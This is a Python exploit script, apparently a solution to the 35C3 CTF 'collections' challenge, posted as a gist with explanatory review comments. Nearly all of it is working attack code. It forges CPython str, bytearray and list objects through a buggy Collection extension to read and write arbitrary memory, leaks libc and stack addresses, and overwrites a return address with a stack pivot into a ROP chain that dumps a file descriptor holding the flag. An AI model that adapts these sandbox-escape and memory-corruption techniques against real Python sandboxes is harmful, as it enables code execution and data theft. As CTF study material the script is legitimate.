
@m1ghtym0
Created December 30, 2018 15:06
35c3-collections
#import os
#flag = open("flag", "r")
#os.dup2(flag.fileno(), 1023)
#flag.close()
#
#import Collection
#a = Collection.Collection({"a":1337, "b":[1.2], "c":{"a":45545}})
#a = Collection.Collection({"a":1337, "b":[1.2], "c":{"a":45545}, "d":[1, 2]})
#b = Collection.Collection({"b":[1.2], "a":1337, "c":{"a":45545}, "d":[1, 2]})
# debug loop
#for i in range(100000000000):
# a.get("a")
foo = "AAAAAAAA"  # NOTE(review): never referenced anywhere below
# 256-entry table: lookup[i] is the character whose code point is i
# (0x00..0xff).  It backs the local chr()/ord() replacements defined below;
# presumably the builtins of those names are unavailable in the target
# context (the bytearray lookup further down avoids a builtin name too).
lookup = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
def pause():
    """Spin on Collection.get() for an effectively unbounded number of iterations.

    Looks like a debugger attach point (cf. the commented "# debug loop" at the
    top of the file); the only call site, near the bottom, is commented out.
    """
    probe = Collection.Collection({"a": 1337, "b": [1.2], "c": {"a": 45545}})
    for _ in range(100000000000):
        probe.get("a")
def chr(num):
    """Return the single character whose code point is *num*.

    Stand-in for the builtin of the same name, backed by the module-level
    ``lookup`` table; ordinary str indexing applies, so values outside the
    table raise IndexError and negative values index from the end.
    """
    table = lookup
    return table[num]
def ord(num):
    """Return the position of *num* in the module-level ``lookup`` table.

    Stand-in for the builtin of the same name: for a single character this is
    its code point.  str.index semantics apply (substring search, ValueError
    when absent).
    """
    position = lookup.index(num)
    return position
def p64(num):
    """Pack *num* as eight little-endian bytes, returned as a str with one
    character (code point 0..255) per byte, built via the local chr().

    Only the low 64 bits are used; a negative value comes out in two's
    complement form because Python's right shift is arithmetic.
    """
    pieces = []
    for shift in range(0, 64, 8):
        pieces.append(chr((num >> shift) & 0xff))
    return "".join(pieces)
def u64(string):
    """Unpack a str of byte-valued characters as a little-endian integer.

    For an 8-character input this is the usual little-endian u64.  The
    accumulator is shifted left by 8 after each of the first seven characters
    only, so shorter inputs come out shifted and characters beyond the eighth
    are merely added; callers here always pass the 8-character result of
    read().
    """
    acc = 0
    remaining = 7  # shifts still to apply
    for ch in string[::-1]:
        acc = acc + ord(ch)
        if remaining > 0:
            acc = acc << 8
            remaining -= 1
    return acc
def addrof(obj):
    """Return id(obj); the code below relies on CPython reporting an object's
    memory address as its id."""
    address = id(obj)
    return address
def read(addr):
    """Return the object Collection.get() hands back for a crafted key; the
    callers below (``u64(read(addr))``) treat it as an 8-character str whose
    character data is located at *addr*.

    The payload is laid out like the PyUnicodeObject captured in the pwndbg
    dump below (refcount, type pointer, length, hash, state word, wstr,
    utf8_length, utf8, wstr_length, data) with both the utf8 and data
    pointers set to *addr*.  NOTE(review): the type address 0x9d1400 and the
    +0x48 data offset are fixed values for one particular interpreter build
    and are not derived at runtime; how Collection.get() ends up returning
    the fake object is not visible in this file.

    pwndbg> p *(PyUnicodeObject *) 0x7ffff617a4e0
    $4 = {
    _base = {
    _base = {
    ob_base = {
    ob_refcnt = 1,
    ob_type = 0x9d1400 <PyUnicode_Type>
    },
    length = 4,
    hash = -1,
    state = {
    interned = 0,
    kind = 1,
    compact = 0,
    ascii = 1,
    ready = 1
    },
    wstr = 0x0
    },
    utf8_length = 4,
    utf8 = 0x7ffff7f51788 "AAAA",
    wstr_length = 0
    },
    data = {
    any = 0x7ffff7f51788,
    latin1 = 0x7ffff7f51788 "AAAA",
    ucs2 = 0x7ffff7f51788,
    ucs4 = 0x7ffff7f51788
    }
    }
    pwndbg> x/15gx 0x7ffff617a4e0
    0x7ffff617a4e0: 0x0000000000000001 0x00000000009d1400
    0x7ffff617a4f0: 0x0000000000000004 0xffffffffffffffff
    0x7ffff617a500: 0x683a713c3a6874c4 0x0000000000000000
    0x7ffff617a510: 0x0000000000000004 0x00007ffff7f51788
    0x7ffff617a520: 0x0000000000000000 0x00007ffff7f51788
    0x7ffff617a530: 0x0000000000000000 0x0000000000000000
    0x7ffff617a540: 0x0000000000000000 0x0000000000000000
    0x7ffff617a550: 0x0000000000000000
    """
    #payload = p64(0x1) + p64(id(str)) + p64(8) + p64(0xffffffffffffffff) + p64(0x683a713c3a6874c4) + p64(0) + p64(8) + p64(addr) + p64(0) + p64(addr)
    payload = ""
    payload += p64(0x4)                 # ob_refcnt
    #payload += p64(id(str))
    payload += p64(0x9d1400)            # ob_type -> PyUnicode_Type (address taken from the dump)
    payload += p64(8)                   # length
    payload += p64(0xffffffffffffffff)  # hash = -1, as in the dump
    payload += p64(0x683a713c3a6874c4)  # fifth qword of the dump (state bits + padding)
    payload += p64(0)                   # wstr
    payload += p64(8)                   # utf8_length
    payload += p64(addr)                # utf8 -> addr
    payload += p64(0)                   # wstr_length
    payload += p64(addr)                # data.any -> addr
    # Address of the payload's character data inside the str object
    # (+0x48 is assumed to be the data offset for this build -- confirm).
    fakestring = id(payload)+0x48
    # NOTE(review): `a` is never read; whether it matters for allocation
    # ordering is not evident from this file.
    a = Collection.Collection({"a":1337, "b":[1.2]})
    b = Collection.Collection({"b":[1.2], "a":fakestring})
    #return len(b.get("a"))
    #return b.get("a")
    return b.get("b")
def write(addr, value):
    """Store the 64-bit *value* at *addr* and assert that a read-back agrees.

    Three payloads are chained: a fake bytearray object whose buffer pointers
    are *addr* (type pointer 0x9ce7e0, PyByteArray_Type per the author's
    comment), a one-element item array pointing at it, and a fake list object
    (type pointer 0x9c8a80; the commented ``id(list)`` line suggests the list
    type) pointing at that array.  Collection.get() is then used to obtain the
    fake list, its single element is indexed like a bytearray, and the eight
    characters of p64(value) are written into it one by one.

    NOTE(review): all three type addresses and the +0x48 data offsets are
    build-specific constants, and the final ``assert`` is skipped under
    ``python -O``.
    """
    #payload = p64(0x4) + p64(0x9ce7e0) + p64(0x20) + p64(0x21) + p64(addr) + p64(addr) + p64(0)
    payload = ""
    payload += p64(0x4)                 # ob_refcnt
    payload += p64(0x00000000009ce7e0) # PyByteArray_Type
    # The next five qwords are presumably ob_size, ob_alloc, ob_bytes,
    # ob_start and ob_exports of PyByteArrayObject -- confirm against the
    # build's headers.
    payload += p64(0x20)
    payload += p64(0x21)
    payload += p64(addr)
    payload += p64(addr)
    payload += p64(0)
    fakebyteobj = id(payload)+0x48      # assumed data offset inside the str object
    print("fakebyteobj: " + hex(fakebyteobj))
    payload3 = ""
    payload3 += p64(fakebyteobj)        # one-entry item array for the fake list
    fakelistelem = id(payload3)+0x48
    print("fakelistelements: " + hex(fakelistelem))
    payload2 = ""
    payload2 += p64(0x4)                # ob_refcnt
    #payload2 += p64(id(list))
    payload2 += p64(0x9c8a80)           # ob_type (list type, per the commented line above)
    payload2 += p64(1)                  # presumably ob_size
    payload2 += p64(fakelistelem)       # presumably ob_item -> the one-entry array
    payload2 += p64(10)                 # presumably allocated
    fakelist = id(payload2)+0x48
    print("fakelist: " + hex(fakelist))
    current_val = u64(read(addr))       # value before the write, for the log only
    print("current_val = " + hex(current_val))
    # NOTE(review): `a` is never read, as in read().
    a = Collection.Collection({"a":1337, "b":[1.2]})
    b = Collection.Collection({"b":[1.2], "a":fakelist})
    list_obj = b.get("b")
    print("Got back: " + hex(id(list_obj)))
    byteobj = list_obj[0]
    print("Got back: " + hex(id(byteobj)))
    #byteobj[0] = 0x
    # Copy the eight little-endian bytes of value into the fake bytearray.
    i = 0
    for c in p64(value):
        byteobj[i] = ord(c)
        i += 1
    new_val = u64(read(addr))           # read back to verify
    print("[%s] = %s "% (hex(addr), hex(new_val)))
    assert new_val == value
# --- Driver -----------------------------------------------------------------
# Uses read()/write() above to: (1) leak the Collection type pointer and
# derive the extension image and libc bases from it, (2) obtain a stack
# address via environ, (3) assemble a short ROP chain (readv from fd 1023 into
# a buffer, then write that memory to fd 1), and (4) overwrite a qword on the
# stack with a stack-pivot gadget whose popped value is the chain's address.
# Every offset, type address and gadget address below is a fixed value for one
# specific interpreter/libc build.
bar = Collection.Collection({"a":1337, "b":[1.2], "c":{"a":45545}})  # only its type pointer is read
#dummy = [1, 2, 3]
dummy = [0x1337]
dummy_addr = addrof(dummy)  # NOTE(review): never used afterwards
collections_type = u64(read(addrof(bar)+8))  # ob_type field (offset 8, after ob_refcnt)
print("Collections-Type: " + hex(collections_type))
collections_base = collections_type - 0x2041e0  # fixed offset of the type object within the extension image
print("Collections-Base: " + hex(collections_base))
mprotect_got = collections_base + 0x2040B0  # GOT slot for mprotect, per the name (fixed offset)
mprotect = u64(read(mprotect_got))
libc_base = mprotect - 0x11bae0  # fixed offset of mprotect within this libc
print("Libc-Base: " + hex(libc_base))
#environ_var = libc_base + 0x00000000003ee098
environ_var = 0xa4f980  # absolute address of an environ pointer; the libc-relative variant is commented out
#print("environ: " + hex(environ_var))
environ = u64(read(environ_var))
print("environ: " + hex(environ))
stack = environ  # starting point of the downward stack scan below
#stack = environ - 0x208c0
#stack = environ - 0x208c0 + (0xd000-0xc4d8)
print("Stack-Base: " + hex(stack))
mmap_libc = libc_base + 0x000000000011b9d0  # only referenced by the commented-out mmap chain
write_libc = libc_base + 0x0000000000110140
readv_libc = libc_base + 0x0000000000116600
# Gadget addresses are absolute (0x4xxxxx range), presumably in the
# interpreter binary itself.  pop_rcx, pop_r8, pop_r9 and mov_rax are only
# used by the commented-out mmap chain.
pop_rdi = 0x0000000000421612
pop_rsi = 0x000000000042110e
pop_rdx = 0x00000000004026c1
pop_rcx = 0x0000000000421103 #: pop rcx ; ret
pop_r8 = 0x000000000048ba3b
pop_r9 = 0x00000000005f4f1a # pop r9 ; pop r10 ; pop rdx ; pop rbx ; pop rbp ; ret
mov_rax = 0x00000000004adf88 #: mov rsi, rax ; mov rax, rsi ; ret
rop_chain = ""
## mmap  (unused alternative, left as the author had it)
#rop_chain += p64(pop_r9)
#rop_chain += p64(0) #r9 -> offset
#rop_chain += p64(0) #r10
#rop_chain += p64(1) #rdx -> PROT_READ
#rop_chain += p64(0) #rbx
#rop_chain += p64(0) #rbp
#rop_chain += p64(pop_rcx)
#rop_chain += p64(0) #rcx -> flag
#rop_chain += p64(pop_r8)
#rop_chain += p64(1023) #r8 -> fd
#rop_chain += p64(pop_rsi)
#rop_chain += p64(20) #rsi -> len
#rop_chain += p64(pop_rdi)
#rop_chain += p64(0) #rdi -> rdi
#rop_chain += p64(mmap_libc)
# readv
# The bytearray class is fetched through object's subclass list instead of by
# name, which suggests the builtin name is not reachable in this context.
read_buff = [x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "bytearray"][0](64)
payload = ""
payload += p64(id(read_buff))  # iovec.iov_base = id() of the bytearray object
payload += p64(64)             # iovec.iov_len
iovec = id(payload)+0x48       # address of the iovec bytes inside the str (same +0x48 assumption as read()/write())
rop_chain += p64(pop_rdi)
rop_chain += p64(1023)         # rdi -> fd (the commented header dup2()s "flag" onto fd 1023)
rop_chain += p64(pop_rsi)
rop_chain += p64(iovec)        # rsi -> iovec
rop_chain += p64(pop_rdx)
rop_chain += p64(1)            # rdx -> iovcnt
rop_chain += p64(readv_libc)
# write
rop_chain += p64(pop_rdi)
rop_chain += p64(1) #rdi -> fd
rop_chain += p64(pop_rsi)
rop_chain += p64(id(read_buff)) #rsi -> buf
rop_chain += p64(pop_rdx)
rop_chain += p64(4096) #rdx -> len
rop_chain += p64(write_libc)
rop_addr = id(rop_chain) + 0x48  # address of the chain's bytes inside the str
print("ROP-chain: " + hex(rop_addr))
print("Looking for stack val")
# Walk downward from environ one qword at a time until the fixed marker
# 0x4a6f10 is found (presumably a return address into the interpreter binary
# -- confirm); that slot is the one overwritten below.
# NOTE(review): the scan has no lower bound; if the marker is absent it keeps
# reading until read() faults.
found = False
stack_frame = stack
while not found:
    print(hex(stack_frame))
    val = u64(read(stack_frame))
    if val == 0x4a6f10:
        found = True  # redundant with the break; the loop only ever exits here
        break
    stack_frame -= 8
pop_rsp = 0x0000000000420b11 #: pop rsp ; ret
stack_rop = [pop_rsp, rop_addr]  # [replacement return address, value popped into rsp]
#stack_frame = stack + 0x20778
#stack_frame = stack + 0x20778 - 0x9e65ed0
ret_val = u64(read(stack_frame))  # marker value, logged before the overwrite
print("stack-val: " + hex(ret_val))
#pause()
# The higher slot is written first and the marker slot last.
write(stack_frame+8, stack_rop[1])
write(stack_frame, stack_rop[0])
ret_val = u64(read(stack_frame))  # logged after the overwrite
print("stack-val: " + hex(ret_val))